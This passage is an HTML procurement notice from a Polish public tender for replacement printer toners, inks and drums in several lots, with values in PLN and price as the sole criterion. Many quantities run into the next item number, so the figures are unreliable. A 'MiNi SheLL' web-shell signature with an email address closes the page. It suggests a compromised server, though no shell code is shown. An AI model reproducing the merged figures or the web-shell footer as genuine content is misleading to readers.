części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 10576,14<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 24<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>4</td><td><b>Nazwa: </b></td><td>Pakiet 4</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZAMIENNIKI1	Toner HP - LJ 1100/3310/3200 szt. 552	Toner HP P1102 85A szt. 6903	Toner HP LaserJet 5000;5100;5000LE C4129X	szt. 74	Toner do drukarki HP Color 3600 Q6470A CZARNY	szt. 25	Toner do drukarki HP Color 3600 Q6471A NIEBIESKI	szt. 26	Toner do drukarki HP Color 3600 Q6472A ŻÓŁTY	szt. 27	Toner do drukarki HP Color 3600 Q6473A CZERWONY	szt. 28	Toner HP - LJ 1010/1012/1015/1020/3055 12A	szt. 4009	Toner HP - LJ 1200/3300/3330 15A	szt. 9510	Toner HP - LJ 2055 05X	szt. 9011	Toner HP - LJ P1006 35A	szt. 30012	Toner HP - LJ P2015/M2727/P2010 53A	szt. 1213	Toner HP - LJ 1320/1160 szt. 114	toner hp - LJ 1600/2600 BK	szt.	815	toner hp - LJ 1600/2600 C	szt.	316	toner hp - LJ 1600/2600 Y	szt.	317	toner hp - LJ 1600/2600 M	szt.	318	Toner HP P1505/M1120/1522,2K LHP CB436A	szt. 719	Toner HP LJ CP2025 530 BLACK	szt. 320	Toner HP LJ CP2025 531 cyan	szt. 221	Toner HP LJ CP2025 532 yellow	szt. 222	Toner HP LJ CP2025 533 magenta	szt. 223	Toner Hp 1150 Q2624A	szt. 224	Toner HP LJ 2035 CE505A	szt. 325	Toner HP LaserJet CP1215, 1515N, 1518N CB541 niebieski	szt. 326	Toner HP LaserJet CP1215, 1515N, 1518N CB542 żółty	szt. 327	Toner HP LaserJet CP1215, 1515N, 1518N CB543 czerwony	szt. 328	Toner HP LaserJet CP1215, 1515N, 1518N CB540A czarny	szt. 1029	Toner do HP LJ CP1025 black HP126A	szt. 1030	Toner do HP LJ CP1025 yellow HP126A	szt. 131	Toner do HP LJ CP1025 cyan HP126A	szt. 132	Toner do HP LJ CP1025 magenta HP126A	szt. 133	Toner hp LJ 26A czarny ProM402 dw	szt. 734	Toner 25tys.kopii Hp laser M605 Cf281x szt. 235	Toner HP laserjet PRO200 CF210A czarny	szt. 236	Toner HP laserjet PRO200 CF212A ŻÓŁTY	szt. 237	Toner HP laserjet PRO200 CF213A CZERWONY	szt. 238	Toner HP laserjet PRO200 CF211A niebieski	szt. 239	Toner HP laser Jet Pro 400 M401DNE CF280X kopii6800	szt. 440	Toner Brother HL-1112E TN-1030	szt. 241	toner brother TN-3280 na 8 tys.kopii do drukarki HL 5340D	szt.	142	toner Brother TN-2320 MFC-L2700DW DC-PL 2520DW Druk 2600stron czarny	szt. 8543 TONER do Brother MFC-L8650COW TN-326 K CZARNY	szt. 1444	TONER do Brother MFC-L8650COW TN-326 Y	szt. 645	TONER do Brother MFC-L8650COW TN-326 M	szt. 646 TONER do Brother MFC-L8650COW TN-326 C	szt. 647	Toner Brother MFC 8510DN TN3380 8000TYS..kopii	szt. 948	toner Brother DCP-L5500dn TN3430	szt. 2249	Toner brother mfc L2712Dn L2372DN L2312D (TN2411)	szt. 2450	toner do Brother HL-3170cdw TN-241 BK	szt. 451	toner do Brother HL-3170cdw TN-245 C	szt. 452	toner do Brother HL-3170cdw TN-245 M	szt. 453	toner do Brother HL-3170cdw TN-245 Y	szt. 454	toner BROTHER HL-L2310D TN-2420	szt. 255	Toner do drukarki Brother HL- 5250DN ref: TN 3170	szt. 456	Toner oki 4100 TYP 9 do drukarki B4100	szt.	257	Toner OKI B6200/B6250/B6300	szt. 358	toner do OKI- C531 DN czarny	szt. 359	toner do OKI- C531 DN Magenta	szt. 260	toner do OKI- C531 DN Yellow	szt. 261	toner do OKI- C531 DN Cyan	szt. 262	toner do oki c532 1500stron czarny	szt. 563	toner do oki c532 1500stron cyan	szt. 464	toner do oki c532 1500stron magenta	szt. 465	toner do oki c532 1500stron yellow	szt. 466	toner oki B431DN 12tys. Kopii	szt. 367 toner do OKI-MC342w 1500tys.wydr. CZARNY	szt. 1568 toner do OKI-MC342w 1500tys.wydr. Y	szt. 1569 toner do OKI-MC342w 1500tys.wydr. M	szt. 1570 toner do OKI-MC342w 1500tys.wydr. C	szt. 1571	toner do OKI-MC342w 1500tys.wydr. 1kpl.=3szt KOLOR	kpl.	772 toner SAMSUNG ML-TD305L ML-3750	szt. 273	Toner Samsung ML-1640/SEE /ML-2240 D1082	szt. 274	Toner samsung black CLP325 K4072	szt. 375	Toner samsung cyan CLP325 C4072	szt. 276	Toner samsung magenta CLP325 M4072	szt. 277	Toner samsung yellow CLP325 Y4072	szt. 278	toner samsung czarny CLP 365, 360 K406 szt. 279	Toner samsung cyan CLP 365, 360 C406	szt. 180	Toner samsung magenta CLP 365, 360 M406	szt. 181	Toner samsung yellow CLP 365, 360 Y406	szt. 182	Toner Samsung xpress C430w K404	szt. 683	Toner Samsung xpress C430w C404	szt. 284	Toner Samsung xpress C430w M404	szt. 285	Toner Samsung xpress C430w Y404	szt. 286	toner Samsung Ml2250/2252	szt. 287	Toner OLIVETTI d-Copia 4023MF B1234	szt. 1088	Toner d-Copia16,16MF,200,200MF,1600 B0446	szt. 4089	Toner OLIVETTI d-Copia 163MF	szt. 290 toner OLIVETTI d-Copia 3513/3503 MF b1011	szt. 1691	Toner OLIVETTI d-Copia BO958 ( KOPIARKA 928MF)	szt. 792 Toner do olivetti 1800 B0839	szt. 1093	TONER OLIVETTI d-Copia 200D (220D) NR.BO477	szt. 494	Toner OLIVETTI d-Copia 283 ( BO740 )	szt. 895	Toner Konica Minolta Magicolor 1690MF CZARNY	szt. 3096	Toner Konica Minolta Magicolor 1690MF Cyan	szt. 397	Toner Konica Minolta Magicolor 1690MF Yellow	szt. 398	Toner Konica Minolta Magicolor 1690MF Magenta szt. 399	Zestaw - 3 Tonery kolory do drukarki Koni.Minol.Magicolor 1600 , 1690MF	szt.	5100	Toner Toshiba T 1800E (do kserokopiarki Toshiba e-STUDIO 18)	szt. 2101	Toner do TOSHIBA T-4590E E-STUDIO 456SE	szt. 4102	Toner do faxu Panasonic FXFL613 ( 83 )	szt. 1103	Toner do faxu Panasonic FXMB 773 ( 92 )	szt. 1104	Toner FS 1320D/1370 KIT TK170 KYOCERA	szt. 2105	toner do Kyocera M3040idn TK3150	szt. 3106	Toner KYOCERA ECOSYS M2035dn TK1140	szt. 1107	Toner do kserokopiarki KYOCERA FS-6025/6030 MFP TK475	szt. 2108	Toner CANON CRG728 MF4410	szt. 5109	Toner do kserokopiarki CANON iR 1018 1020 CXV18	szt. 2110	Toner do xero Canon FX10 szt. 10111	toner PHASER 3260 3000kopii	szt. 1112	toner do lexmark MS312 dn	szt. 1113	Toner do kserokopiarki Sharp AR-168T (5012)	szt. 2114	toner do XEROX WorkCentre 3345 (15 tyś. kopii)	szt. 1<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30125100-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 164530,06<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 24<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>5</td><td><b>Nazwa: </b></td><td>Pakiet 5</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZAMIENNIKI1	Tusz hp nr 339 czarny	szt.	62	Tusz hp nr 344 kolor	szt.	63	tusz hp 343 kolor	szt.	54	tusz hp 338 czarny	szt.	55	Tusz HP C9351A ( 21 ) F2280	szt. 36	tusz HP6230 935 żółty	szt. 57	tusz HP6230 935 czerwony	szt. 58	tusz HP6230 935 niebieski	szt. 59	tusz HP6230 935 czarny	szt. 810	tusz HP PRO 251DW 950 czarny	szt. 511	tusz HP PRO 251DW 951 yellow szt. 312	tusz HP PRO 251DW 951 magenta	szt. 313	tusz HP PRO 251DW 951 cyan	szt. 314	Tusz HP DESKJET 5650 nr. 56	szt. 215	Tusz HP DESKJET 5650 nr. 57	szt. 1016	TUSZ HP 934 XL czarny Officejet Pro 6230/6830	szt. 317	TUSZ HP 935 XL żółty Officejet Pro 6230/6830	szt. 218	TUSZ HP 935 XL czerwony Officejet Pro 6230/6830	szt. 219	TUSZ HP 935 XL niebieski Officejet Pro 6230/6830	szt. 220	tusz364 czarny CN684EE HP 3520 13ml	szt. 1521	tusz364 CYAN CB323EE HP 3520 13ml	szt. 422	Tusz364 MAGENTA CB324EE HP 3520 13ml	szt. 423	Tusz364 yellow CB325EE HP 3520	szt. 424	Tusz do drukarki 3050 CH563EE HP 301XL CZARNY szt. 1025	Tusz do drukarki 3050 CH564EE HP 301XL kolor	szt. 926	TUSZ czarny HP652 kolor	szt. 227	TUSZ czarny HP652 czarny	szt. 228	Tusz Brother DCP J315W J140W żółty	szt. 1029	Tusz Brother DCP J315W J140W niebieski	szt. 1030	Tusz Brother DCP J315W J140W czerwony	szt. 1031	Tusz Brother DCP J315W J140W czarny	szt. 1032	Tusz ZESTAW 4 szt Brother DCP J315W J140W	kpl.	1033	tusz Brother DCP J105 LX529 XL-BL czarny	szt. 534	tusz Brother DCP J105 LX525 XL-C cyan szt. 535	tusz Brother DCP J105 LX525 XL-Y yellow szt. 536	tusz Brother DCP J105 LX525 XL-M magenta	szt. 537	tusz brother Ic3619 bk MFC J3930	szt. 3038	tusz brother Ic3619 c MFC J3930	szt. 2539	tusz brother Ic3619 y MFC J3930	szt. 2540	tusz brother Ic3619 m MFC J3930	szt. 2541	tusz czarny Brother DCP T 500W BT600BK 140ml	szt. 1042	tusz magenta Brother DCP T 500W BT500M	szt. 1043	tusz yellow Brother DCP T 500W BT500Y	szt. 1044	tusz cyan Brother DCP T 500W BT500C	szt. 1445	Tusz SAMSUNG CLP 315 czarny xeromat	szt. 546	Tusz SAMSUNG CLP 315 magenta	szt. 247	Tusz SAMSUNG CLP 315 yellow	szt. 248	Tusz SAMSUNG CLP 315 cyan	szt. 249	tusz lexmark PRO905 200-209SE cyan 100XL	szt. 350	tusz lexmark PRO905 200-209SE CZARNY100 XL szt. 351	tusz lexmark PRO905 200-209SE Magenta 100XL	szt. 352	tusz do lexmarka PRO905 200-209SE yellow 100XL	szt. 353	tusz cannon CL41 black iP 1600/2200/6210D	szt. 554	tusz cannon CL40 color iP 1600/2200/6210D	szt. 5<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30125100-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 15267,81<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 24<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>6</td><td><b>Nazwa: </b></td><td>Pakiet 6</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZAMIENNIKI1	Bęben do faxu Panasonic KXMB 773 ( 93 )	szt.	22 BĘBEN MFC DR-2300 BRATHER MFC-L2720DW	szt. 33	Bęben do drukarki Brother HL/MFC-L8650CDW	szt. 24	Bęben do drukarki Brother HL-5250DN	szt. 25	Bęben Brother DC-PL 2520DW, MFC-L2700DW	szt. 76	Bęben do drukarki Brother MFC-L8450CDW	szt. 17	Bęben do drukarki Brother DCP-L5500DN	szt. 58	Bęben do drukarki Brother DR-2200 ( MFC-7360N)	szt. 19	Bęben do drukarki Samsung CLP365	szt. 110	bęben do drukarki olvetti 3503 mf DK 170 (3513mf)	szt. 311	Bęben do drukarki XPRESS C430w	szt. 212	Taśma OKI 09002303	szt. 100<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>30125100-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 5996,61<br/>Waluta: <br/>PLN<br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: 24<br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: <br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">100,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com